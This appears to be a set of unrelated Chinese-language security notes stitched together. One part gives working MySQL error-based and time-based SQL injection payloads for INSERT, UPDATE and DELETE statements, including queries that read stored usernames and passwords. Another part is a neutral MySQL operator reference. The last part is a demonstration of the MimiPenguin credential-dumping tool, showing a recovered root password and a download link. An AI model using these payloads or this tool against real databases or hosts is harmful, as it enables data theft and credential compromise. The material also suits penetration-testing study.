insert


这里我们用updatexml来演示
使用逻辑运算符(and or xor && ||)

mysql> insert into users values (3,'name' xor updatexml(2,concat(0x7e,(version())),0) xor '','pass');
ERROR 1105 (HY000): XPATH syntax error: '~5.5.40-log'
mysql> insert into users values (5,'name' and updatexml(2,concat(0x7e,(version())),0) and '','pass');
ERROR 1105 (HY000): XPATH syntax error: '~5.5.40-log'

使用算术运算符(+ - * /)

mysql> insert into users values (3,'name'+updatexml(2,concat(0x7e,(version())),0) xor '','pass');
ERROR 1105 (HY000): XPATH syntax error: '~5.5.40-log'
mysql> insert into users values (3,'name'*updatexml(2,concat(0x7e,(version())),0) xor '','pass');
ERROR 1105 (HY000): XPATH syntax error: '~5.5.40-log'

使用位运算符连接(| &)

mysql> insert into users values (3,'name'&updatexml(2,concat(0x7e,(version())),0) xor '','pass');
ERROR 1105 (HY000): XPATH syntax error: '~5.5.40-log'
mysql> insert into users values (3,'name'|updatexml(2,concat(0x7e,(version())),0) xor '','pass');
ERROR 1105 (HY000): XPATH syntax error: '~5.5.40-log'

update


mysql> update users set username = 'name' and updatexml(2,concat(0x7e,(version())),0) and '' where id = 5;
ERROR 1105 (HY000): XPATH syntax error: '~5.5.40-log'

delete


mysql> delete from users where id = 5 or updatexml(2,concat(0x7e,(version())),0) or '';
ERROR 1105 (HY000): XPATH syntax error: '~5.5.40-log'

 

这里需要注意,insert 和 delete 都可以读取当前表的数据,但是 update 不行,因为 MySQL 不允许在 update 的子查询中直接引用正在更新的目标表(见下文的 ERROR 1093)。
使用insert获取当前表的数据,如下:

mysql> insert into users values (5,'name' or updatexml(2,concat(0x7e,(select concat_ws(0x7e,id,username,password) from users limit 0,1)),0) or '','pass');
ERROR 1105 (HY000): XPATH syntax error: '~1~0~root@localhost'

使用delete获取当前表的数据,如下:

mysql> delete from users where id = 5 or updatexml(2,concat(0x7e,(select concat_ws(0x7e,id,username,password) fromusers limit 0,1)),0);
ERROR 1105 (HY000): XPATH syntax error: '~1~0~root@localhost'

而使用update获取不到,如下:

mysql> update users set username = 'test' or updatexml(2,concat(0x7e,(select concat_ws(0x7e,id,username,password) from users limit 0,1)),0) where id = 5;
ERROR 1093 (HY000): You can't specify target table 'users' for update in FROM clause

这里可以使用:

mysql> update users set username = 'test' or updatexml(2,concat(0x7e,(select concat_ws(0x7e,id,username,password) f
rom (select * from users)xx limit 0,1)),0) where id = 5;
ERROR 1105 (HY000): XPATH syntax error: '~1~test~root@localhost'

或者用主键重复的报错注入也可以

mysql> update users set username = 'test' and (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT (SELECT concat_ws(0x7e,id,username,password) FROM users LIMIT 0,1) ) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) and '' where id = 5;
ERROR 1062 (23000): Duplicate entry '1~0~root@localhost1' for key 'group_key'

当然我们之前也介绍过报错注入的姿势,用其他的报错语句同样可以达到效果。

参考文章


http://static.hx99.net/static/drops/tips-2078.html

测试表结构如下:

mysql> select * from users;
+----+----------+----------------+
| id | username | password |
+----+----------+----------------+
| 1 | 0 | root@localhost |
| 2 | 0 | 123456 |
+----+----------+----------------+
2 rows in set (0.00 sec)

insert


使用逻辑运算符(and or xor && ||)连接如下:
需要注意如果使用And或者&&的话,这里分为两种情况
1)存在注入的字段为字符型。

insert : insert into users values (1,'{injecthere}','password');

那么逻辑运算符不能使用 and 和 &&,可以使用 or、||、xor。因为非数字的字符串在进行逻辑运算时会被转换为 0,and 在左侧为 0 时会短路,所以 and 后面的 sleep 不会执行。

mysql> insert into users values (5,'name' and sleep(2),'pass');
Query OK, 1 row affected, 1 warning (0.00 sec)

可以看到没有延迟。

2)存在注入的字段为Int型。

insert into users values ({injecthere},'Vinc','password');

这里可以使用and && || or xor。
需要注意如果逻辑运算符使用And或者&&,那么注入的数不能为0。

mysql> insert into users values (-1 and sleep(2),'vinc','password');
Query OK, 1 row affected (2.00 sec)

可以看到延迟 2 秒。

mysql> insert into users values (0 and sleep(2),'vinc','password');
Query OK, 1 row affected (0.00 sec)

可以看到没有延迟。

一般建议使用or || xor测试

mysql> insert into users values (18,'vinc' xor sleep(2),'password');
Query OK, 1 row affected, 1 warning (2.00 sec)

 

使用算术运算符(+ - * /)连接如下

mysql> insert into users values (4,'name'+sleep(2),'pass');
Query OK, 1 row affected, 1 warning (2.00 sec)
mysql> insert into users values (8,'name'*sleep(2),'pass');
Query OK, 1 row affected, 1 warning (2.00 sec)
mysql> select * from users where id = 8 ;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 8 | 0 | pass |
+----+----------+----------+
1 row in set (0.00 sec)

这里插入的 username 为 0:'name' 在算术运算中被转换为 0,而 sleep() 返回 0,所以整个表达式的结果为 0。

 

使用位运算符连接(| &)如下

mysql> insert into users values (12,'vinc' | sleep(2),'password');
Query OK, 1 row affected, 1 warning (2.00 sec)
mysql> insert into users values (13,'vinc' & sleep(2),'password');
Query OK, 1 row affected, 1 warning (2.00 sec)

update


和insert的用法相同。

update users set username = '{injecthere}' where id = 1;

mysql> update users set password = 'Vinc' or sleep(2) where id = 4;
Query OK, 0 rows affected, 1 warning (2.00 sec)
Rows matched: 1 Changed: 0 Warnings: 1
mysql> update users set password = 'Vinc' or if(ord(substr(version()from(1)for(1)))=53,sleep(2),1) where id = 4;
Query OK, 0 rows affected, 1 warning (2.00 sec)
Rows matched: 1 Changed: 0 Warnings: 1

delete


delete : delete from users where id > {injecthere} ;

delete的注入位置位于where后所以和select是一样的。

mysql> delete from users where id = 5 and sleep(2);
Query OK, 0 rows affected (2.00 sec)

因为 sleep() 函数返回 0,`id = 5 and sleep(2)` 整体为假,所以这里没有行被删除。

参考文章


https://osandamalith.com/2017/03/13/mysql-blind-injection-in-insert-and-update-statements/

算数运算符



mysql> select 1+2;

mysql> select 2-1;

mysql> select 2*3;

mysql> select 5/3;

mysql> SELECT 5 DIV 2;

mysql> select 5%2,mod(5,2);

比较运算符


等于
mysql> select 1=0,1=1,null=null;
不等于
mysql> select 1<>0,1<>1,null<>null;
安全等于
mysql> select 1<=>1,2<=>0,0<=>0,null<=>null;
小于
mysql> select 'a'<'b','a'<'a','a'<'c',1<2;
小于等于
mysql> select 'bdf'<='b','b'<='b',0<1;
大于
mysql> select 'a'>'b','abc'>'a',1>0;
大于等于
mysql> select 'a'>='b','abc'>='a',1>=0,1>=1;
BETWEEN
mysql> select 10 between 10 and 20, 9 between 10 and 20;
IN
mysql> select 1 in (1,2,3), 't' in ('t','a','b','l','e'), 0 in (1,2);
IS NULL
mysql> select 0 is null,null is null;
IS NOT NULL
mysql> select 0 is not null, null is not null;
LIKE
mysql> select 123456 like '123%', 123456 like '%123%', 123456 like '%321%';
REGEXP
mysql> select 'abcdef' regexp 'ab', 'abcdefg' regexp 'k';

逻辑运算符



mysql> select not 0, not 1, not null;
mysql> select ! 0, ! 1, ! null;

mysql> select (1 and 1), (0 and 1), (3 and 1), (1 and null);
mysql> select (1 && 1), (0 && 1), (3 && 1), (1 && null);

mysql> select (1 or 0), (0 or 0), (1 or null), (1 or 1), (null or null);
mysql> select (1 || 0), (0 || 0), (1 || null), (1 || 1), (null || null);
异或
mysql> select (1 xor 1), (0 xor 0), (1 xor 0), (0 xor 1), (null xor 1);
xor:两者中恰好有一个为真时结果为 1,同真或同假时为 0。

位运算符


位与
mysql> select 2&3;
mysql> select 2&3&4;
参加运算的两个数据,按二进制位进行“与”运算。
运算规则:0&0=0; 0&1=0; 1&0=0; 1&1=1;
即:两位同时为“1”,结果才为“1”,否则为0
例如:3&5 即 0000 0011 & 0000 0101 = 0000 0001 因此,3&5的值得1。

位或
mysql> select 2|3;
参加运算的两个对象,按二进制位进行“或”运算。
运算规则:0|0=0; 0|1=1; 1|0=1; 1|1=1;
即 :参加运算的两个对象只要有一个为1,其值为1。
例如:3|5 即 0000 0011 | 0000 0101 = 0000 0111 因此,3|5的值得7。

位异或
mysql> select 2^3;
参加运算的两个数据,按二进制位进行“异或”运算。
运算规则:0^0=0; 0^1=1; 1^0=1; 1^1=0;
即:参加运算的两个对象,如果两个相应位为“异”(值不同),则该位结果为1,否则为0。

位取反
mysql> select ~0;
+----------------------+
| ~0                   |
+----------------------+
| 18446744073709551615 |
+----------------------+
1 row in set (0.00 sec)

位右移
mysql> select 100>>3;
将一个运算对象的各二进制位全部右移若干位,a >> 2 将a的二进制位右移2位,右边丢弃。
mysql> select 9 >> 2 ;
+--------+
| 9 >> 2 |
+--------+
|      2 |
+--------+
1 row in set (0.00 sec)

位左移
mysql> select 100<<3;
将一个运算对象的各二进制位全部左移若干位,a << 2 将a的二进制位左移2位,右补0。
mysql> select 3 << 2 ;
+--------+
| 3 << 2 |
+--------+
|     12 |
+--------+
1 row in set (0.00 sec)

运算符优先级顺序


最高优先级 :=
1 ||, OR, XOR
2 &&, AND
3 BETWEEN, CASE, WHEN, THEN, ELSE
4 =, <=>, >=, >, <=, <, <>, !=, IS, LIKE, REGEXP, IN
5 |
6 &
7 <<, >>
8 -, +
9 *, /, DIV, %, MOD
10 ^
11 - (unary minus), ~ (unary bit inversion)
12 !, NOT
最低优先级 BINARY, COLLATE

从当前已登录的 Linux 桌面用户 Dump 密码,与 Windows 下的工具 mimikatz 类似。
前提是需要Root权限。
测试通过的系统:

Kali 4.3.0 (rolling) x64 (gdm3)
Ubuntu Desktop 12.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2)
Ubuntu Desktop 16.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2)
XUbuntu Desktop 16.04 x64 (Gnome Keyring 3.18.3-0ubuntu2)
VSFTPd 3.0.3-8+b1 (Active FTP client connections)
Apache2 2.4.25-3 (Active/Old HTTP BASIC AUTH Sessions) [Gcore dependency]
openssh-server 1:7.3p1-1 (Active SSH connections - sudo usage)

在Kali下测试

root@kali-vincent:/tmp# uname -a
Linux kali-vincent 4.0.0-kali1-amd64 #1 SMP Debian 4.0.4-1+kali2 (2015-06-03) x86_64 GNU/Linux
root@kali-vincent:/tmp# ./pass.sh 
007ca000-0088a000
7f86970e4000-7f86978e4000
7f86978e5000-7f86980e5000
7fff18c61000-7fff18c82000
7f33ef00f000-7f33ef019000
7f33ef218000-7f33ef219000
7f33ef219000-7f33ef21a000
7f33ef21a000-7f33ef21d000
7f33ef41c000-7f33ef41d000
7f33ef41d000-7f33ef41e000
7f33ef41e000-7f33ef423000
7f33ef622000-7f33ef623000
7f33ef623000-7f33ef624000
7f33ef624000-7f33ef626000
7f33ef825000-7f33ef826000
7f33ef826000-7f33ef827000
7f33ef827000-7f33ef828000
7f33efa28000-7f33efa29000
7f33efa29000-7f33efa2a000
7f33efa2a000-7f33efa2e000
7f33efc2d000-7f33efc2e000
7f33efc2e000-7f33efc2f000
7f33efc2f000-7f33efc32000
7f33efe31000-7f33efe32000
7f33efe32000-7f33efe33000
7f33efe33000-7f33efe3a000
7f33f0039000-7f33f003a000
7f33f003a000-7f33f003b000
7f33f003b000-7f33f003f000
7f33f023e000-7f33f023f000
7f33f023f000-7f33f0240000
7f33f0240000-7f33f0274000
7f33f0473000-7f33f0476000
7f33f0476000-7f33f0477000
7f33f0477000-7f33f0479000
7f33f0678000-7f33f0679000
7f33f0679000-7f33f067a000
7f33f067a000-7f33f067c000
7f33f087b000-7f33f087c000
7f33f087c000-7f33f087d000
7f33f087d000-7f33f0881000
7f33f0a80000-7f33f0a81000
7f33f0a81000-7f33f0a82000
7f33f0a82000-7f33f0a83000
7f33f0c83000-7f33f0c84000
7f33f0c84000-7f33f0c85000
7f33f0c85000-7f33f0c86000
7f33f0e85000-7f33f0e86000
7f33f0e86000-7f33f0e87000
7f33f0e87000-7f33f0e88000
7f33f1087000-7f33f1088000
7f33f1088000-7f33f1089000
7f33f1089000-7f33f1097000
7f33f1296000-7f33f1297000
7f33f1297000-7f33f1298000
7f33f1298000-7f33f12a4000
7f33f12a4000-7f33f12a9000
7f33f14a8000-7f33f14a9000
7f33f14a9000-7f33f14aa000
7f33f14aa000-7f33f14ac000
7f33f16ab000-7f33f16ac000
7f33f16ac000-7f33f16ad000
7f33f16ad000-7f33f16b0000
7f33f18af000-7f33f18b0000
7f33f18b0000-7f33f18bb000
7f33f1aba000-7f33f1abb000
7f33f1abb000-7f33f1abc000
7f33f1abc000-7f33f1ac6000
7f33f1cc5000-7f33f1cc6000
7f33f1cc6000-7f33f1cc7000
7f33f1cc7000-7f33f1cce000
7f33f1ecd000-7f33f1ece000
7f33f1ece000-7f33f1ecf000
7f33f1ecf000-7f33f1ee7000
7f33f20e6000-7f33f20e7000
7f33f20e7000-7f33f20e8000
7f33f20e8000-7f33f20ec000
7f33f20ec000-7f33f2100000
7f33f22ff000-7f33f2300000
7f33f2300000-7f33f2301000
7f33f2301000-7f33f2303000
7f33f2303000-7f33f2306000
7f33f2505000-7f33f2506000
7f33f2506000-7f33f2507000
7f33f2507000-7f33f2512000
7f33f2711000-7f33f2712000
7f33f2712000-7f33f2713000
7f33f2713000-7f33f2741000
7f33f2940000-7f33f2942000
7f33f2942000-7f33f2943000
7f33f2943000-7f33f2944000
7f33f2944000-7f33f29b0000
7f33f2bb0000-7f33f2bb1000
7f33f2bb1000-7f33f2bb2000
7f33f2bb2000-7f33f2bb5000
7f33f2db4000-7f33f2db5000
7f33f2db5000-7f33f2db6000
7f33f2db6000-7f33f2dd0000
7f33f2fcf000-7f33f2fd1000
7f33f2fd1000-7f33f2fd2000
7f33f2fd2000-7f33f2fdc000
7f33f2fdc000-7f33f2ff1000
7f33f31f0000-7f33f31f1000
7f33f31f1000-7f33f31f2000
7f33f31f2000-7f33f31f4000
7f33f31f4000-7f33f3393000
7f33f3593000-7f33f3597000
7f33f3597000-7f33f3599000
7f33f3599000-7f33f359d000
7f33f359d000-7f33f35a0000
7f33f379f000-7f33f37a0000
7f33f37a0000-7f33f37a1000
7f33f37a1000-7f33f3865000
7f33f3a65000-7f33f3a72000
7f33f3a72000-7f33f3a75000
7f33f3a75000-7f33f3abb000
7f33f3cbb000-7f33f3cbd000
7f33f3cbd000-7f33f3cbf000
7f33f3cbf000-7f33f3cc7000
7f33f3ec6000-7f33f3ec7000
7f33f3ec7000-7f33f3ec8000
7f33f3ec8000-7f33f3ef6000
7f33f3ef6000-7f33f3f10000
7f33f410f000-7f33f4110000
7f33f4110000-7f33f4111000
7f33f4111000-7f33f4113000
7f33f4312000-7f33f4313000
7f33f4313000-7f33f4314000
7f33f4314000-7f33f44df000
7f33f46df000-7f33f46fc000
7f33f46fc000-7f33f470c000
7f33f470c000-7f33f470f000
7f33f470f000-7f33f4730000
7f33f4930000-7f33f4931000
7f33f4931000-7f33f4932000
7f33f4932000-7f33f4934000
7f33f4934000-7f33f4941000
7f33f4b41000-7f33f4b42000
7f33f4b42000-7f33f4b43000
7f33f4b43000-7f33f4b4c000
7f33f4d4b000-7f33f4d4c000
7f33f4d4c000-7f33f4d4d000
7f33f4d4d000-7f33f4d4e000
7f33f4d4e000-7f33f4d6e000
7f33f4e2e000-7f33f4f6e000
7f33f4f6e000-7f33f4f6f000
7f33f4f6f000-7f33f4f70000
7f33f4f70000-7f33f4f71000
7f33f4f71000-7f33f502d000
7f33f50c1000-7f33f5201000
7f33f5201000-7f33f520c000
7f33f522b000-7f33f522d000
7f33f522d000-7f33f5230000
7f33f5230000-7f33f5231000
7f33f5231000-7f33f523b000
7f33f62f9000-7f33f6342000
7ffefa8f0000-7ffefa911000
7ffefa950000-7ffefa952000
7ffefa952000-7ffefa954000
ffffffffff600000-ffffffffff601000
MimiPenguin Results:
[SYSTEM - GNOME] root:hehe123

下载地址:https://github.com/huntergregal/mimipenguin


参考文章:http://www.freebuf.com/sectool/131165.html